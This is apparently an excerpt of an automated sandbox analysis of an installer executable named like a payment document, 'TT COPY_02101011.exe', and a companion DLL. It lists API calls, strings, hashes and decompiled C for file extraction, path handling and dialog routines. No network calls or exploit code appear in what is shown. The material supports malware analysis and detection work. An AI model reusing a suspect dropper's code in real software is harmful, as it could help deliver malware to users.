                                                • Instruction Fuzzy Hash: 67314FB6900219BBEB14DF94DC85FEE73B8EB48341F008458FB0996145E734EA949BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 100021B9
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 100021C9
                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10002224
                                                • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,?,00000004), ref: 10002246
                                                • RegCloseKey.ADVAPI32(?), ref: 10002250
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FromString$CloseOpenValue
                                                • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                                                • API String ID: 3688305288-1256949467
                                                • Opcode ID: 0041d9ab5ef820f73d5a14189c757d2bf3704b4691c9e3bdc57319b2a0c2b2da
                                                • Instruction ID: 87e670aaba4debd1bc59582c74321e0f22317074ae09b411ca6526cff9a90919
                                                • Opcode Fuzzy Hash: 0041d9ab5ef820f73d5a14189c757d2bf3704b4691c9e3bdc57319b2a0c2b2da
                                                • Instruction Fuzzy Hash: 85316FB6900208BBEB10DFD4DC45FEE73B8EB48340F008058FB09A6145E774EA949BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 100014BA
                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 100014CA
                                                • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000152F
                                                • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,00000000,00000004), ref: 1000155E
                                                • RegCloseKey.ADVAPI32(?), ref: 1000156E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FromString$CloseCreateValue
                                                • String ID: %s\%s\%s\0x%08x\%s$Enable$LanguageProfile
                                                • API String ID: 32363474-1306068423
                                                • Opcode ID: 443df1889662e57bd12b83c7017a512e3e56eaa453bfa8b613d20d63e31c19ab
                                                • Instruction ID: dfd999879bfc19bf0f540acf43a102d6e140894a7d5dd1f2d21ba76d441db4b2
                                                • Opcode Fuzzy Hash: 443df1889662e57bd12b83c7017a512e3e56eaa453bfa8b613d20d63e31c19ab
                                                • Instruction Fuzzy Hash: 25210CB5900318FBEB10DB90CC89FEEB7B8EB48711F108558F6156A185E774AA848BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000070), ref: 100010AA
                                                • HeapAlloc.KERNEL32(00000000), ref: 100010B1
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 10001108
                                                • HeapFree.KERNEL32(00000000), ref: 1000110F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: returning %p
                                                • API String ID: 756756679-1981732286
                                                • Opcode ID: eeca40bdf19d387dd9ebf24a08be757335c9a397eb24d1316ee1a1f8876deb75
                                                • Instruction ID: 2b119429821eb8094975dbfedf490236e0edb5d0f238ba3051d0ceca3c90b30e
                                                • Opcode Fuzzy Hash: eeca40bdf19d387dd9ebf24a08be757335c9a397eb24d1316ee1a1f8876deb75
                                                • Instruction Fuzzy Hash: 97213C74A44208FFE700DFA0CC89B9D77B4EB49745F208044FA09AB385D770AE80DB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,-00000039), ref: 1000305D
                                                • RegEnumKeyExW.ADVAPI32 ref: 100030A6
                                                • RegCloseKey.ADVAPI32(?), ref: 100030C5
                                                • CLSIDFromString.OLE32(?,?), ref: 100030FE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CloseEnumFromOpenString
                                                • String ID: %s\%s\0x%08x$'$LanguageProfile
                                                • API String ID: 2638302380-2813637096
                                                • Opcode ID: ea1a4f91903695fdcb4b26df9c24b16d92fdfbfc9e3b8c258f6deb48741101aa
                                                • Instruction ID: 520633f65f34149f6797ac5967d72ee33fae3fd7b9c3a84646dcbd6a95092bdc
                                                • Opcode Fuzzy Hash: ea1a4f91903695fdcb4b26df9c24b16d92fdfbfc9e3b8c258f6deb48741101aa
                                                • Instruction Fuzzy Hash: 6261E6B5600209EFDB04DF54C890B9ABBB9FF48354F10C259F9099B396D774EA85CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405B89(CHAR* _a4) {
                                                				char _t5;
                                                				char _t7;
                                                				char* _t15;
                                                				char* _t16;
                                                				CHAR* _t17;
                                                
                                                				_t17 = _a4;
                                                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                					_t17 =  &(_t17[4]);
                                                				}
                                                				if( *_t17 != 0 && E0040548B(_t17) != 0) {
                                                					_t17 =  &(_t17[2]);
                                                				}
                                                				_t5 =  *_t17;
                                                				_t15 = _t17;
                                                				_t16 = _t17;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
                                                							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
                                                							_t16 = CharNextA(_t16);
                                                						}
                                                						_t17 = CharNextA(_t17);
                                                						_t5 =  *_t17;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t16 =  *_t16 & 0x00000000;
                                                				while(1) {
                                                					_t16 = CharPrevA(_t15, _t16);
                                                					_t7 =  *_t16;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t16 =  *_t16 & 0x00000000;
                                                					if(_t15 < _t16) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}








                                                APIs
                                                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-89165186
                                                • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                                • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t35;
                                                				long _t37;
                                                				void* _t40;
                                                				long* _t49;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L15:
                                                					return 0;
                                                				}
                                                				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                				if(_t49 == 0) {
                                                					goto L15;
                                                				}
                                                				_t35 =  *_t49;
                                                				if((_t49[5] & 0x00000002) != 0) {
                                                					_t35 = GetSysColor(_t35);
                                                				}
                                                				if((_t49[5] & 0x00000001) != 0) {
                                                					SetTextColor(_a8, _t35);
                                                				}
                                                				SetBkMode(_a8, _t49[4]);
                                                				_t37 = _t49[1];
                                                				_v16.lbColor = _t37;
                                                				if((_t49[5] & 0x00000008) != 0) {
                                                					_t37 = GetSysColor(_t37);
                                                					_v16.lbColor = _t37;
                                                				}
                                                				if((_t49[5] & 0x00000004) != 0) {
                                                					SetBkColor(_a8, _t37);
                                                				}
                                                				if((_t49[5] & 0x00000010) != 0) {
                                                					_v16.lbStyle = _t49[2];
                                                					_t40 = _t49[3];
                                                					if(_t40 != 0) {
                                                						DeleteObject(_t40);
                                                					}
                                                					_t49[3] = CreateBrushIndirect( &_v16);
                                                				}
                                                				return _t49[3];
                                                			}








                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0040266E(struct _OVERLAPPED* __ebx) {
                                                				void* _t27;
                                                				long _t32;
                                                				struct _OVERLAPPED* _t47;
                                                				void* _t51;
                                                				void* _t53;
                                                				void* _t56;
                                                				void* _t57;
                                                				void* _t58;
                                                
                                                				_t47 = __ebx;
                                                				 *(_t58 - 8) = 0xfffffd66;
                                                				_t52 = E004029E8(0xfffffff0);
                                                				 *(_t58 - 0x44) = _t24;
                                                				if(E0040548B(_t52) == 0) {
                                                					E004029E8(0xffffffed);
                                                				}
                                                				E004055E3(_t52);
                                                				_t27 = E00405602(_t52, 0x40000000, 2);
                                                				 *(_t58 + 8) = _t27;
                                                				if(_t27 != 0xffffffff) {
                                                					_t32 =  *0x42eb74; // 0x8200
                                                					 *(_t58 - 0x2c) = _t32;
                                                					_t51 = GlobalAlloc(0x40, _t32);
                                                					if(_t51 != _t47) {
                                                						E00403098(_t47);
                                                						E00403066(_t51,  *(_t58 - 0x2c));
                                                						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                                						 *(_t58 - 0x30) = _t56;
                                                						if(_t56 != _t47) {
                                                							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                                							while( *_t56 != _t47) {
                                                								_t49 =  *_t56;
                                                								_t57 = _t56 + 8;
                                                								 *(_t58 - 0x38) =  *_t56;
                                                								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                								_t56 = _t57 +  *(_t58 - 0x38);
                                                							}
                                                							GlobalFree( *(_t58 - 0x30));
                                                						}
                                                						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                                						GlobalFree(_t51);
                                                						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                					}
                                                					CloseHandle( *(_t58 + 8));
                                                				}
                                                				_t53 = 0xfffffff3;
                                                				if( *(_t58 - 8) < _t47) {
                                                					_t53 = 0xffffffef;
                                                					DeleteFileA( *(_t58 - 0x44));
                                                					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                				}
                                                				_push(_t53);
                                                				E00401423();
                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
                                                				return 0;
                                                			}












                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                                • GlobalFree.KERNEL32 ref: 00402717
                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                                • GlobalFree.KERNEL32 ref: 00402730
                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID:
                                                • API String ID: 3294113728-0
                                                • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                                                • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404CC9(CHAR* _a4, CHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				CHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				CHAR* _t26;
                                                				signed int _t27;
                                                				CHAR* _t28;
                                                				long _t29;
                                                				signed int _t39;
                                                
                                                				_t26 =  *0x42e344; // 0x0
                                                				_v8 = _t26;
                                                				if(_t26 != 0) {
                                                					_t27 =  *0x42ec14; // 0x0
                                                					_v12 = _t27;
                                                					_t39 = _t27 & 0x00000001;
                                                					if(_t39 == 0) {
                                                						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
                                                					}
                                                					_t26 = lstrlenA(0x4297b0);
                                                					_a4 = _t26;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x4297b0;
                                                							_v52 = 1;
                                                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t39;
                                                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                						}
                                                						if(_t39 != 0) {
                                                							_t28 = _a4;
                                                							 *((char*)(_t28 + 0x4297b0)) = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                						if(_t26 < 0x800) {
                                                							_t26 = lstrcatA(0x4297b0, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t26;
                                                			}


















                                                APIs
                                                • lstrlenA.KERNEL32(004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F4C3,73BCEA30), ref: 00404D25
                                                • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                                                • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404598(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}















                                                APIs
                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004045B3
                                                • GetMessagePos.USER32 ref: 004045BB
                                                • ScreenToClient.USER32 ref: 004045D5
                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 004045E7
                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040460D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                                                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                                                				char _v68;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x414b78; // 0x4b8ef
                                                					_t11 =  *0x428b88; // 0x4b8f3
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextA(_a4,  &_v68);
                                                					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                				}
                                                				return 0;
                                                			}







                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                                                • MulDiv.KERNEL32(0004B8EF,00000064,0004B8F3), ref: 00402B73
                                                • wsprintfA.USER32 ref: 00402B83
                                                • SetWindowTextA.USER32(?,?), ref: 00402B93
                                                • SetDlgItemTextA.USER32 ref: 00402BA5
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402B7D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                                                • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • lstrcpynW.KERNEL32(?,?,00000027), ref: 10003436
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 10003499
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Openlstrcpyn
                                                • String ID: %s\%s\0x%08x$(%p)$LanguageProfile
                                                • API String ID: 77534328-1421907492
                                                • Opcode ID: 46edd7e52df682f74a4b4d30c36d611ffc15542ded8736f38e699b611a6b2313
                                                • Instruction ID: bcdec95f2d607e4fc0eb77369190f68030dd34f4a7564bbe946f2f6de08662e1
                                                • Opcode Fuzzy Hash: 46edd7e52df682f74a4b4d30c36d611ffc15542ded8736f38e699b611a6b2313
                                                • Instruction Fuzzy Hash: 8B31FAB5D00208EFEB04DF94C885B9EB7B9EB48305F108199E905AB356E735AE94CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • unsupported interface: %s, xrefs: 1000163F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID: unsupported interface: %s
                                                • API String ID: 2931989736-1937909893
                                                • Opcode ID: 8e52320923f2ce158a943d5b5a8acfdf741acb0a0bd6a2f20ef3a5411ef2854b
                                                • Instruction ID: c0289ddaac958acca42572efceb48c0f5e969638305156980df2b8405fdc2e54
                                                • Opcode Fuzzy Hash: 8e52320923f2ce158a943d5b5a8acfdf741acb0a0bd6a2f20ef3a5411ef2854b
                                                • Instruction Fuzzy Hash: BA3139B9900209EFEB00DFA0DC45BEE77B1EB88384F148468F9055F345D675EA90CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • (%p)->(IID_IEnumTfInputProcessorProfiles %p), xrefs: 10001204
                                                • (%p)->(IID_IUnknown %p), xrefs: 100011C9
                                                • (%p)->(%s %p), xrefs: 10001239
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp
                                                • Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _memcmp
